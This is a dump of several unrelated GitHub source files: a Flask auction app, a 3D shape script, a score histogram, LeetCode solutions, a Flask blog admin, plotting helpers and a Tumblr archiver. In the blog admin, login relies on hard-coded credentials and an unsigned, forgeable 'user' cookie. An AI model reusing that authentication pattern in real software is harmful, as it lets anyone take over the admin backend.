def createBuyerTransaction(self, transactionIdx, buyerIdx, v, vmin, vmax, bmin, bmax):\n newTransaction = BuyerTransaction(transactionIdx, buyerIdx, v, vmin, vmax, bmin, bmax)\n self.buyerTransaction.append(newTransaction)\n return True\n \n def createSellerTransaction(self, transactionIdx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, 
smax):\n newTransaction = SellerTransaction(transactionIdx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, smax)\n self.sellerTransaction.append(newTransaction)\n self.computeSellerResponse(newTransaction.idx)\n return True\n\n#dummy data\ndummyBuyerTransaction = [BuyerTransaction(1, 1, v=5, vmin=1, vmax=10, bmin=30, bmax=150),\n BuyerTransaction(2, 2, v=10, vmin=2, vmax=20, bmin=10, bmax=100),\n BuyerTransaction(3, 3, v=30, vmin=3, vmax=30, bmin=20, bmax=200),\n BuyerTransaction(4, 4, v=40, vmin=4, vmax=40, bmin=30, bmax=300),\n BuyerTransaction(5, 5, v=50, vmin=5, vmax=50, bmin=40, bmax=400)]\n \ndummySellerTransaction = [SellerTransaction(1, 1, 1, c=3, cmin=1, cmax=10, smin=30, smax=150),\n SellerTransaction(2, 1, 2, c=3, cmin=2, cmax=16, smin=10, smax=100),\n SellerTransaction(3, 1, 3, c=2, cmin=3, cmax=15, smin=20, smax=200),\n SellerTransaction(4, 4, 4, c=40, cmin=4, cmax=40, smin=30, smax=300),\n SellerTransaction(5, 5, 5, c=50, cmin=5, cmax=50, smin=40, smax=400)]\n\n#dummy data\nbuyers = [Buyer((13.7203636, 100.4983167), 1), Buyer((13.7210854,100.4952133), 2), Buyer((13.7057435,100.4809689), 3), Buyer((13.6562446,100.4817984), 4), Buyer((13.7213584,100.5305075), 5)]\nsellers = [Seller((13.651362879156872,100.49486250045186),1), Seller((13.7057435,100.4809689), 2), Seller((13.6562446,100.4817984), 3), Seller((13.7213584,100.5305075), 4), Seller((13.7277753,100.5352955), 5)]\n\n#initial\nauctioneer = Auctioneer()\nauctioneer.buyers = buyers\nauctioneer.sellers = sellers\nauctioneer.buyerTransaction = dummyBuyerTransaction\nauctioneer.sellerTransaction = dummySellerTransaction\nfor transaction in auctioneer.sellerTransaction:\n auctioneer.computeSellerResponse(transaction.idx)\n\n@app.route('/buyer/<id>')\ndef buyer(id):\n global auctioneer\n pending = auctioneer.getBuyerPendingTransaction(int(id))\n complete = auctioneer.getBuyerCompletedTransaction(int(id))\n print(pending)\n return render_template('buyer.html',title='buyer',id=id, pending=pending,complete=complete)\n\n@app.route('/seller/<id>')\ndef seller(id):\n pending = auctioneer.getSellerPendingTransaction(int(id))\n accept = auctioneer.getSellerAcceptedTransaction(int(id))\n complete = auctioneer.getSellerCompletedFailedTransaction(int(id))\n return render_template('seller.html',title='seller',id=id, pending=pending,accept=accept,complete=complete)\n\n@app.route('/auctioneer/<id>')\ndef index(id):\n pending = auctioneer.getAuctioneerPendingTransaction()\n complete = auctioneer.getAuctioneerCompletedTransaction()\n fail = auctioneer.getAuctioneerFailedTransaction()\n return render_template('auctioneer.html',title='auctioneer',id=id,pending=pending,complete=complete,fail=fail)\n\n@app.route('/create/<id>', methods=['POST'])\ndef create(id):\n global auctioneer\n v = request.form['v']\n vmin = request.form['vmin']\n vmax = request.form['vmax']\n bmin = request.form['bmin']\n bmax = request.form['bmax']\n auctioneer.countBuyerTransaction = auctioneer.countBuyerTransaction+1\n auctioneer.createBuyerTransaction(auctioneer.countBuyerTransaction, int(id), int(v), int(vmin), int(vmax), int(bmin), int(bmax))\n\n return redirect('/buyer/'+id)\n\n@app.route('/response/<id>', methods=['POST'])\ndef response(id):\n global auctioneer\n c = request.form['c']\n cmin = request.form['cmin']\n cmax = request.form['cmax']\n smin = request.form['smin']\n smax = request.form['smax']\n parentIdx = request.form['idx']\n print('{} {} {} {} {} {}'.format(c,cmin,cmax,smin,smax,parentIdx))\n auctioneer.countSellerTransaction = auctioneer.countSellerTransaction+1\n 
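# createSellerTransaction appends the counter-offer and immediately runs computeSellerResponse on it\n 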
auctioneer.createSellerTransaction(auctioneer.countSellerTransaction, int(parentIdx), int(id), int(c), int(cmin), int(cmax), int(smin), int(smax))\n\n return redirect('/seller/'+id)\n\n\n@app.route('/confirmBuyerTransaction/<id>', methods=['POST'])\ndef confirmBuyerTransaction(id):\n global auctioneer\n sellerTransactionIdx = int(request.form['idx'])\n auctioneer.completeBuyerTransaction(sellerTransactionIdx)\n return redirect('/buyer/'+id)\n\nif __name__ == '__main__':\n app.run(debug=True)\t","repo_name":"titlethanason/V2V_ElectricSharing","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11681948302","text":"import torch\nfrom model_prog import Sampler, MLP, FDGRU, ENCGRU, progToData, get_encoding, run_eval_decoder\nfrom ShapeAssembly import hier_execute\nimport utils\nimport sys\nfrom tqdm import tqdm\n\nsa_enc = \"model_output/chair_autoencoder/models/encoder_119.pt\"\nsa_dec = \"model_output/chair_autoencoder/models/decoder_119.pt\"\n\ndevice = torch.device(\"cuda\")\n\n\ndef getInds(train_ind_file):\n inds = set()\n with open(train_ind_file) as f:\n for line in f:\n inds.add(line.strip())\n return inds\n\n\ndef do_sa():\n train_ind_file = f'data_splits/chair/train.txt'\n train_inds = list(getInds(train_ind_file))\n\n encoder = torch.load(sa_enc).to(device)\n decoder = torch.load(sa_dec).to(device)\n\n for ind in tqdm(train_inds):\n rprog = utils.loadHPFromFile(f'data/chair/{ind}.txt')\n shape = progToData(rprog)\n enc, _ = get_encoding(shape, encoder, mle=True)\n hier_prog, _ = run_eval_decoder(enc, decoder, False)\n verts, faces = hier_execute(hier_prog)\n utils.writeObj(verts, faces, f'autoencoder_objs/{ind}.obj')\n\n\nif __name__ == '__main__':\n do_sa()\n","repo_name":"andrewkpeterson/ShapeAssembly","sub_path":"code/create_training_objs.py","file_name":"create_training_objs.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"}
+{"seq_id":"26395801758","text":"#AUTHOR: BABATUNDE IDAHOR\n#COURSE: CS133\n#TERM : FALL 2015\n#DATE : 11/3/2015\n\n\n##This program accepts a list of test scores and produces a histogram summarizing\n##the data.\n\n\n# Enter Input score here\nnum_of_values = int(input('Enter the number of test scores you have: ')) # number of values to be entered by the user\ntest_score = list() # creates a list to store test_scores\nstart = 0\n\n\n#This loop creates a list and stores/appends the values in test_score.\nfor i in range(start, num_of_values, 1):\n test_scoreEntered = float(input('Enter test score here: ')) # takes floating values\n test_scoreEntered = round(test_scoreEntered) # round to the nearest integer\n test_score.append(test_scoreEntered)\nprint('---------------All Done-------------------------- ' + '\\n' + 'Data Entry so far ' + str(test_score))\n\n\n# Creates a new dictionary and traverses the dictionary\ndict_score = dict()\nfor i in test_score:\n if i not in dict_score:\n dict_score[i] = '*'\n else:\n dict_score[i] += '*'\n \nprint('----------------Histogram Result------------------') \nnum = list(dict_score.keys())\nnum.sort()\n\n\n# Displays the histogram #\nfor i in num:\n print('v'+str(int(i)) + ' ' + dict_score[i])\n\n
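# Illustrative session (hypothetical inputs, shown only for clarity):\n# Enter the number of test scores you have: 2\n# Enter test score here: 88.4\n# Enter test score here: 88.2\n# ---------------All Done-------------------------- \n# Data Entry so far [88, 88]\n# ----------------Histogram Result------------------\n# v88 **\n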
\n\n\n\n","repo_name":"bidahor13/Python_projects","sub_path":"P3/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3345638297","text":"\"\"\"\r\nBrute force (times out)\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n def dailyTemperature(self, T):\r\n res = []\r\n for i in range(len(T)):\r\n flag = 0\r\n for j in range(i + 1, len(T)):\r\n if T[j] > T[i]:\r\n flag += 1\r\n res.append(j - i)\r\n break\r\n if flag == 0:\r\n res.append(0)\r\n return res\r\n\r\n\r\n# print(Solution().dailyTemperature([73, 74, 75, 71, 69, 72, 76, 73, 80]))\r\n\r\n\"\"\"\r\nMonotonic stack approach:\r\nthe stack is kept monotonically decreasing\r\n\"\"\"\r\n\r\n\r\nclass Solution1:\r\n def dailyTemperature(self, T):\r\n l = len(T)\r\n res = [0 for i in range(l)]\r\n stack = [] # the stack stores indices of temperatures\r\n for i in range(l):\r\n temperature = T[i]\r\n while stack and temperature > T[stack[-1]]:\r\n prev_index = stack.pop() # pop every index whose temperature is below the current one, until the stack is empty or its top is warmer\r\n res[prev_index] = i - prev_index # the popped index waited this many days for a warmer temperature\r\n stack.append(i)\r\n return res","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 100/739.dailyTemperature.py","file_name":"739.dailyTemperature.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4573763182","text":"# URLs + view functions\nfrom django.core import paginator\nfrom flask import Blueprint, render_template, request, redirect, url_for, session, abort\nfrom .models import *\n\nblog = Blueprint('blog', __name__)\nadmin = Blueprint('admin', __name__)\n\n\n@blog.route('/')\ndef home():\n return 'HOME'\n\n##################################################################################\n## Admin backend\n##################################################################################\n# Admin login\n@admin.route('/login/',methods=['GET','POST'])\ndef admin_login():\n if request.method == 'POST':\n # receive the client data\n username = request.form.get('username')\n password = request.form.get('userpwd')\n # check whether the login succeeded\n if username == 'song' and password == '123':\n res = redirect(url_for('admin.admin_index'))\n # set the cookie: store the value under the key\n res.set_cookie('user',username)\n\n\n # session alternative:\n # session['user'] = username\n # session['username'] = username\n print(username)\n print(res)\n return res\n return 'Login failed!'\n return render_template('admin/login.html')\n\n# Log out: clear the cookie\n@admin.route('/logout/')\ndef admin_logout():\n res = redirect(url_for('admin.admin_login'))\n # delete the cookie by key (for sessions: pop removes one key, clear removes all)\n res.delete_cookie('user')\n\n # session alternative:\n # session.pop('user')\n return res\n\n\n\n# Admin home page\n@admin.route('/admin/')\ndef admin_index():\n # get the cookie\n # # get the current logged-in user\n count = len(Article.query.all())\n username = request.cookies.get('user','')\n\n # session alternative:\n # username = session.get('user','')\n print(username)\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n data = {\n 'count':count,\n 'username':username,\n }\n print(1111)\n print(count)\n print(username)\n return render_template('admin/index.html',**data) # Flask: pass several kwargs with **data, a single one with data=data\n\n\n# Article management\n@admin.route('/article/',methods=['GET','POST'])\ndef admin_article():\n # get the current logged-in user\n username = request.cookies.get('user','')\n print(1111111)\n print(username)\n if username == '':\n abort(403)\n res = redirect(url_for('admin.admin_login'))\n return res\n\n return redirect(url_for('admin.admin_article_page',page=1))\n# Paginated article list (admin):\n@admin.route('/article/<int:page>/')\ndef 
admin_article_page(page):\n per_page = 4 # pagination size: show 4 records per page\n if not page: # default to the first page if the client passed nothing\n page = 1\n articles = Article.query.all()\n articles = articles[(page-1)*per_page:page*per_page]\n my_pageinate = Article.query.order_by('id').paginate(page=page,per_page=per_page)\n username = request.cookies.get('user','')\n data = {\n 'articles': articles,\n 'my_pageinate':my_pageinate,\n 'username':username,\n }\n # print(articles[0].my_article.name,type(articles[0])) # follow the foreign key to the related object's name field\n return render_template('admin/article.html',**data)\n\n\n\n# Add-article page\n@admin.route('/addarticle/',methods = ['POST','GET'])\ndef admin_addarticle():\n # return render_template('admin/add-article.html')\n # fetch all rows from the article-type table\n articletypes = Articletype.query.all()\n username = request.cookies.get('user','')\n if username == '':\n return redirect(url_for('admin.admin_login'))\n if request.method == 'POST':\n # read the form data\n title = request.form.get('title')\n text = request.form.get('content')\n keyword = request.form.get('keywords')\n describe = request.form.get('describe')\n typename = request.form.get('category')\n label = request.form.get('tags')\n img = request.form.get('titlepic')\n data = request.form.get('data')\n\n # create an Article object\n a = Article()\n a.title = title\n a.text = text\n a.keyword = keyword\n a.describe = describe\n a.articletypeid = typename\n a.label = label\n a.img = img\n a.data = data\n db.session.add(a)\n db.session.commit()\n res = redirect(url_for('admin.admin_addarticle'))\n return res\n data = {\n 'articletypes':articletypes,\n 'username':username,\n }\n return render_template('admin/add-article.html',**data)\n\n\n# Category management\n@admin.route('/category/',methods = ['GET','POST'])\ndef admin_category():\n articletypes = Articletype.query.all()\n username = request.cookies.get('user','')\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n if request.method == 'POST':\n name = request.form.get('name')\n alias = request.form.get('alias')\n fid = request.form.get('fid')\n keywords = request.form.get('keywords')\n describe = request.form.get('describe')\n print(name)\n # create an Articletype object\n articletype = Articletype()\n articletype.name = name\n articletype.alias = alias\n articletype.parentnode = fid\n articletype.keyword = keywords\n articletype.describe = describe\n db.session.add(articletype)\n db.session.commit()\n res = redirect(url_for('admin.admin_category'))\n return res\n data = {\n 'articletypes':articletypes,\n 'username':username\n }\n return render_template('admin/category.html',**data)\n\n\n# Notice management\n@admin.route('/notice/',methods = ['GET','POST'])\ndef admin_notice():\n # fetch the data from the database\n\n return redirect(url_for('admin.admin_notice_page',page=1))\n\n# Notice pagination\n@admin.route('/notice/<int:page>/')\ndef admin_notice_page(page):\n per_page = 3\n if not page:\n page = 1\n articles = Article.query.all()\n articles = articles[(page-1)*per_page:page*per_page]\n my_paginate = Article.query.order_by('id').paginate(page=page,per_page=per_page)\n username = request.cookies.get('user', '')\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n data = {\n 'articles': articles,\n 'username': username,\n 'my_paginate':my_paginate\n }\n return render_template('admin/notice.html',**data)\n\n\n# Add notice\n@admin.route('/addnotice/',methods = ['GET',\"POST\"])\ndef admin_addnotice():\n articles = Article.query.all()\n username = request.cookies.get('user','')\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n if request.method == 'POST':\n 
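# notices reuse the Article model: only title/content/keywords/describe are stored\n 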
title = request.form.get('title')\n content = request.form.get('content')\n keywords = request.form.get('keywords')\n describe = request.form.get('describe')\n # create an Article object\n a = Article()\n a.title = title\n a.text = content\n a.keyword = keywords\n a.describe = describe\n db.session.add(a)\n db.session.commit()\n res = redirect(url_for('admin.admin_addnotice'))\n return res\n data = {\n 'username':username,\n 'articles':articles,\n }\n return render_template('admin/add-notice.html',**data)\n\n# Comment management\n@admin.route('/comment/')\ndef admin_comment():\n return render_template('admin/comment.html')\n\n# User management\n@admin.route('/manageuser/')\ndef admin_manageuser():\n return render_template('admin/manage-user.html')\n\n# Login log management\n@admin.route('/loginlog/')\ndef admin_loginlog():\n return render_template('admin/loginlog.html')\n\n# Basic settings\n@admin.route('/setting/')\ndef admin_setting():\n return render_template('admin/setting.html')\n\n# Reading settings\n@admin.route('/readset/')\ndef admin_readset():\n return render_template('admin/readset.html')\n\n# Friend links\n@admin.route('/flink/')\ndef admin_flink():\n return render_template('admin/flink.html')\n\n# Add friend link\n@admin.route('/addflink/')\ndef admin_addflink():\n return render_template('admin/add-flink.html')\n\n\n##################################################################################\n## Frontend blog\n##################################################################################\n# Home page\n@blog.route('/index/')\ndef index():\n articles = Article.query.all()\n articletypes = Articletype.query.all()\n data = {\n 'articles':articles,\n 'articletypes':articletypes,\n }\n return render_template('blog/index.html',**data)\n# # Site home page\n# @blog.route('/index/')\n# def index():\n# return redirect(url_for('blog.index_page',page =1))\n\n# # Home pagination:\n# @blog.route('/index/<int:page>')\n# def index_page(page):\n# per_page = 3\n# if not page:\n# page = 1\n# articles = Article.query.all()\n# articletypes = Articletype.query.all()\n# # fetch all rows, then apply the pagination formula\n# articles = articles[(page-1)*per_page:page:per_page]\n# # paginate: order_by() for sorting, with page number and per_page count\n# my_paginate = Article.query.order_by('id').paginate(page = page,per_page = per_page)\n# data ={\n# 'articles':articles,\n# 'articletypes':articletypes,\n# 'my_paginate':my_paginate,\n# }\n# return render_template('blog/index.html',**data)\n\n\n\n\n# Home pagination:\n\n# Article category listing\n@blog.route('/articletype/<int:articletypeid>/')\ndef Article_type(articletypeid):\n articletypes = Articletype.query.all() # all rows from the type table\n articles = Articletype.query.get(articletypeid).articles # articles linked to this type via the foreign key\n return render_template('blog/index.html',articletypes=articletypes,articles=articles)\n\n\n\n# My albums\n@blog.route('/share/')\ndef share():\n return render_template('blog/share.html')\n\n# My diary\n@blog.route('/list/')\ndef list():\n return render_template('blog/list.html')\n\n# About me\n@blog.route('/about/')\ndef about():\n articletypes = Articletype.query.all() # all rows from the type table\n return render_template('blog/about.html',articletypes=articletypes)\n\n# Guestbook\n@blog.route('/gbook/')\ndef gbook():\n return render_template('blog/gbook.html')\n\n# Content page\n@blog.route('/info/')\ndef info():\n return render_template('blog/info.html')\n\n# Content page\n@blog.route('/infopic/')\ndef infopic():\n return render_template('blog/infopic.html')\n\n# Add article data\n# @blog.route('/addarticle/')\n# def add_article():\n# # create an object and add the data\n# a = Article()\n# a.title = '生命终结的末端,苦短情长'\n# a.text = '天朝羽打开一扇窗,我不曾把你想得平常。看季节一一过往。'\n# a.img = 'App/static/blog/images/7.jpg'\n# try:\n# db.session.add(a)\n# db.session.commit()\n# except:\n# db.session.rollback()\n# 
db.session.flush()\n# return 'fail'\n# return 'success'\n\n","repo_name":"Gcxy1/blog","sub_path":"FlaskBlogPro/App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"23336386744","text":"#========================\n# Cute module\n# Yen Lee Loh 2023-6-4\n#========================\nfrom IPython.display import display,HTML,Markdown\ndisplay(HTML('''\n'''))\ndisplay(Markdown(r'''\n$\\newcommand{\\mean}[1]{\\langle #1 \\rangle}$\n$\\newcommand{\\bra}[1]{\\langle #1 \\rvert}$\n$\\newcommand{\\ket}[1]{\\lvert #1 \\rangle}$\n$\\newcommand{\\adag}{a^\\dagger}$\n$\\newcommand{\\mat}[1]{\\underline{\\underline{\\mathbf{#1}}}}$\n$\\newcommand{\\beq}{\\qquad\\begin{align}}$\n$\\newcommand{\\eeq}{\\end{align}}$\n$\\newcommand{\\half}{\\frac{1}{2}}$\n'''))\n\nimport collections.abc as abc\nimport numpy as np; from numpy import random\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nrng = random.default_rng()\n\nclass simpleCallback:\n def _implements_train_batch_hooks(): return True\n def _implements_test_batch_hooks(): return True\n def _implements_predict_batch_hooks(): return True\n def on_train_begin(logs): return\n def on_train_end(logs): print();return\n def on_epoch_begin(epoch,logs): print ('\\rEpoch =', epoch, end=''); return\n def on_epoch_end(epoch,logs): return\n def on_train_batch_begin(batch,logs): return\n def on_train_batch_end(batch,logs): return\n def set_model(a): return\n def set_params(a): return\n\ndef select (inputs, outputs, nT, nV, shuffle=False, seed=0):\n '''\n Split a dataset into training and validation sets.\n\n inputs: numpy.ndarray, where inputs[n] is the nth input vector (which itself may be a multidimensional array)\n outputs: numpy.ndarray, where outputs[n] is the nth output vector (which itself may be a multidimensional array)\n nT: number of items in training set\n nV: number of items in validation set\n '''\n nmax = len(inputs)\n assert len(outputs)==nmax and nT+nV<=nmax\n if shuffle:\n if seed>0:\n rng2 = np.random.default_rng (seed=seed)\n perm = rng2.permutation (nmax)\n else:\n perm = rng.permutation (nmax)\n else:\n perm = np.arange (nT+nV)\n indicesT = perm[:nT]\n indicesV = perm[-nV:]\n return inputs[indicesT], outputs[indicesT], inputs[indicesV], outputs[indicesV]\n\ndef gallery(xnij, cmap='viridis', labels=None, size=1, maxcols=20, wspace=0.02, hspace=0.02): # size is in inches\n '''\n Display a row of images.\n\n xnij: list of images (each image may be a PIL.Image or numpy.ndarray) \n labels: list of labels for image\n size: width of each image, in inches\n maxcols: maximum number of columns in gallery display before wrapping\n wspace: fractional horizontal spacing between columns of images\n hspace: fractional vertical spacing between rows of images\n ''' \n nmax = len(xnij)\n cols = min(nmax,maxcols) ; rows = (nmax+cols-1)//cols\n fig,axs = plt.subplots (rows,cols, figsize=(cols*size*(1+wspace),rows*size*(1+hspace)), gridspec_kw={'wspace':wspace,'hspace':hspace})\n if nmax==1: axs = np.array([[axs]])\n axs = axs.flatten()\n for ax in axs: ax.axis ('off')\n for n in range(nmax):\n ax = axs[n]\n if isinstance (cmap, abc.Iterable) and not isinstance (cmap, str): c = cmap[n]\n else: c = cmap\n ax.imshow (xnij[n], cmap=c)\n ax.set_aspect('equal')\n if isinstance (labels, abc.Iterable):\n ax.set_title (str(labels[n]))\n \n\ndef axgrid (widths=4, heights=2, ha=.5, va=.5, 
bottomtotop=False, labels=None, removeticks=True, padl=0, padt=0):\n '''\n Make a Figure and an array of Axes, arranged in a grid layout.\n \n Examples:\n \n >>> axgrid (3,1) # One plot of size 3x1\n >>> axgrid ([1,4,2,3], [1]) # One row of plots, all of height 1\n >>> axgrid (6, [.2, .4, .2]) # One column of plots\n >>> axgrid ([.2,3,3], [.2,.4,.4,.4]) # Grid with unequal widths and heights\n >>> axgrid ([.2,3,3], [.2,.4,.4,.4], bottomtotop=True) # Reverse vertical order of plots\n \n If *widths* and *heights* are both 2D arrays, some of the plots may be smaller than the allotted grid cell.\n In this case, *ha* and *va* determine horizontal alignment and vertical alignment. For example:\n \n >>> axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], ha='left', va='top', labels='auto')\n \n Rows are usually in top-to-bottom order. This may be reversed using the *bottomtotop* argument:\n \n >>> axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], ha='right', va='center', labels='auto', bottomtotop=True)\n \n In order to address the Figure and Axes objects, one should save the return values:\n \n >>> fig,axs = axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], removeticks=False)\n >>> ax = axs[0,0]; ax.plot ([1,2],[1,2])\n >>> ax = axs[1,2]; ax.plot ([1,2],[1,2]);\n \n The Axes in row i and column j is axs[i,j]. It has size width[i,j] x height[i,j].\n These conventions are consistent with matrix indexing conventions (and plt.subplots and numpy.ndarray)\n Generally, where indices are concerned, row indices are quoted before column indices.\n However, where physical dimensions are concerned, widths are quoted before heights,\n according to the conventional ordering of Cartesian coordinates (x,y) (and plt.plot).\n \n Parameters\n ----------\n widths, heights : scalar, 1D, or 2D array-like\n \n Returns\n ----------------\n fig, axs : Figure object and numpy.ndarray of Axes objects\n \n Other Parameters\n ----------------\n ha : 'left', 'center', 'right', float between 0 and 1; or 1D or 2D array of such specifications\n va : 'top', 'center', 'bottom', float between 0 and 1; or 1D 2D array of such specifications\n bottomtotop : False (default) or True\n labels : \n None do not draw labels\n 'auto' label each Axes as axs[rowNumber,columnNumber]\n 2D array of strings custom labels to draw in the center of each Axes\n removeticks :\n True set each Axes to show only the frame (and no ticks)\n False leave Axes tick marks intact\n removeframe : \n TBD\n '''\n #======== Determine number of grid cells\n wij = np.array (widths) \n hij = np.array (heights)\n if wij.ndim==0: wij = np.array([wij])\n if hij.ndim==0: hij = np.array([hij])\n jmax = wij.shape[-1]\n imax = hij.shape[0]\n if wij.ndim==1: wij = np.tile (wij, (imax,1)) # Extend 1D to 2D\n if hij.ndim==0: hij = np.tile (hij, (imax,jmax)) # Extend 0D to 2D\n if hij.ndim==1: hij = np.tile (np.array([hij]).T, (1,jmax)) # Extend 1D to 2D\n assert hij.shape == wij.shape,'ERROR: axgrid was supplied with incompatible widths and heights!'\n if not bottomtotop:\n wij = np.flipud (wij)\n hij = np.flipud (hij)\n #======== Deal with padding\n plij = np.array (padl) # padding left\n ptij = np.array (padt) # padding top\n if plij.ndim==0: plij = np.tile (plij, (imax,jmax))\n if ptij.ndim==0: ptij = np.tile (ptij, (imax,jmax))\n #======== Determine dimensions of grid cells\n wj = np.max (wij + plij, axis=0)\n hi = np.max (hij + ptij, axis=1)\n w = np.sum (wj)\n h = np.sum (hi)\n xj = np.concatenate ([[0], np.cumsum (wj)])\n yi = np.concatenate ([[0], np.cumsum (hi)])\n uij = 
np.array(ha) # Array of horizontal alignment pars\n vij = np.array(va) # Array of vertical alignment pars\n if uij.ndim==0: uij = np.tile (uij, (imax,jmax))\n if uij.ndim==1: uij = np.tile (uij, (imax,1))\n if vij.ndim==0: vij = np.tile (vij, (imax,jmax))\n if vij.ndim==1: vij = np.tile (np.array([vij]).T, (1,jmax))\n for i in range(imax):\n for j in range(jmax):\n if isinstance(uij[i,j],str): uij[i,j] = {'left':0, 'center':0.5, 'right':1}.get(uij[i,j])\n if isinstance(vij[i,j],str): vij[i,j] = {'top':0, 'center':0.5, 'bottom':1}.get(vij[i,j])\n uij = uij.astype (np.float64)\n vij = vij.astype (np.float64)\n #======== Create Axes\n fig,axs = plt.subplots (imax, jmax, figsize=(w,h))\n axs = np.array(axs).reshape ((imax,jmax)) # ensure this is always a imax*jmax numpy array of Axes\n for i in range(imax):\n for j in range(jmax):\n i2 = i if bottomtotop else imax-1-i\n x = (xj[j] + uij[i,j]*(wj[j] - wij[i,j])) / w\n y = (yi[i] + vij[i,j]*(hi[i] - hij[i,j])) / h\n axs[i2,j].set_position ([ x, y, wij[i,j]/w, hij[i,j]/h])\n if isinstance(labels,str) and labels=='auto':\n labels = np.array([[f'axs[{i},{j}]\\n{wij[i][j]}x{hij[i][j]}' for j in range(jmax)] for i in range(imax)])\n if removeticks:\n for i in range(imax):\n for j in range(jmax):\n axs[i,j].set_xticks ([])\n axs[i,j].set_yticks ([])\n if isinstance(labels,np.ndarray):\n for i in range(imax):\n for j in range(jmax):\n axs[i,j].text (.5, .5, labels[i,j], ha='center', va='center', fontsize=20)\n axs[i,j].set_facecolor ('#FFFFCC')\n return fig,axs\n\ndef modifyAxSize (ax, wnew, hnew):\n wfig,hfig = ax.figure.get_size_inches()\n x0,y0,x1,y1 = ax.get_position().extents\n x0 *= wfig; x1 *= wfig; y0 *= hfig; y1 *= hfig\n x1 = x0 + wnew\n ym = (y0+y1)/2; y0=ym-hnew/2; y1=ym+hnew/2\n x0 /= wfig; x1 /= wfig; y0 /= hfig; y1 /= hfig\n ax.set_position([x0,y0,x1-x0,y1-y0])","repo_name":"lohyenlee/tf","sub_path":"TF/cute.py","file_name":"cute.py","file_ext":"py","file_size_in_byte":9147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"2391393080","text":"# Create a function that requests three integers and prints the maximum\ndef getnumbers():\n numbers = []\n x = 1\n while x<4:\n num = int(input(\"Enter a number: \"))\n numbers.append(num)\n x+=1\n getmaxnum(numbers)\n\n\ndef getmaxnum(numbers):\n print(max(numbers))\ny=1\nwhile y != 0:\n getnumbers()\n y = int(input(\"To exit enter 0, press other numbers to continue: \\t\"))","repo_name":"KOdunga/Python_Introduction","sub_path":"PycharmProjects/untitled1/maxnumber.py","file_name":"maxnumber.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"17628478436","text":"from django.urls import reverse_lazy\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib import messages\nfrom django.views.generic import FormView\n\nfrom blog.forms import CreateBlogForm, GetPostsForm\nfrom blog.models import Blog\nfrom post.models import Post, Block, Reblog\n\n\nclass Index(FormView):\n template_name = \"blog/index.html\"\n form_class = CreateBlogForm\n success_url = reverse_lazy('index')\n\n @property\n def blogs(self):\n return Blog.objects.all()\n\n def form_valid(self, form):\n json, status_code = form.get_blog_info()\n\n if status_code != 200:\n messages.error(self.request, f'Got {status_code} from Tumblr API')\n\n blog_info = json['response']['blog']\n\n if Blog.objects.filter(uuid=blog_info['uuid']).exists():\n return super().form_valid(form)\n\n 
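# first time seeing this blog: create a local Blog record from the API payload\n 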
Blog.objects.create(\n avatar=blog_info['avatar'],\n description=blog_info['description'],\n name=blog_info['name'],\n title=blog_info['title'],\n total_posts=blog_info['total_posts'],\n url=blog_info['url'],\n )\n\n messages.success(self.request, f\"Blog {blog_info['name']} added!\")\n\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n return super().get_context_data(\n blogs=self.blogs,\n **kwargs\n )\n\n\nclass BlogDetail(FormView):\n template_name = 'blog/detail.html'\n form_class = GetPostsForm\n\n @property\n def blog(self):\n return get_object_or_404(Blog, name=self.kwargs['name'])\n\n def get_success_url(self):\n return reverse_lazy('blog-detail', kwargs=self.kwargs)\n\n def get_context_data(self, **kwargs):\n return super().get_context_data(\n blog=self.blog,\n **kwargs\n )\n\n def form_valid(self, form):\n json, status_code = form.get_posts(self.kwargs['name'], **form.cleaned_data)\n\n if status_code != 200:\n messages.error(self.request, f'Got {status_code} from Tumblr API')\n\n posts = json['response']['posts']\n\n for post in posts:\n # new_post = get_necessary_fields(post, Post, exclude='blog')\n\n if Post.objects.filter(id=post['id']).exists():\n continue\n\n new_post = Post.objects.create(\n blog=self.blog,\n id=post['id'],\n type=post['type'],\n post_url=post['post_url'],\n tags=post.get('tags', ''),\n summary=post['summary'],\n source_url=post.get('source_url', ''),\n content=post.get('content', ''),\n layout=post.get('layout', ''),\n )\n\n for reblog in post['trail']:\n new_reblog = Reblog.objects.create(post=new_post)\n\n for block in reblog['content']:\n\n url = ''\n\n if block.get('media'):\n url = block.get('media')[0]['url']\n\n new_block = Block.objects.create(\n reblog=new_reblog,\n text=block.get('text'),\n url=url,\n )\n new_block.save()\n\n return super().form_valid(form)\n","repo_name":"eadpearce/blog-archiver","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
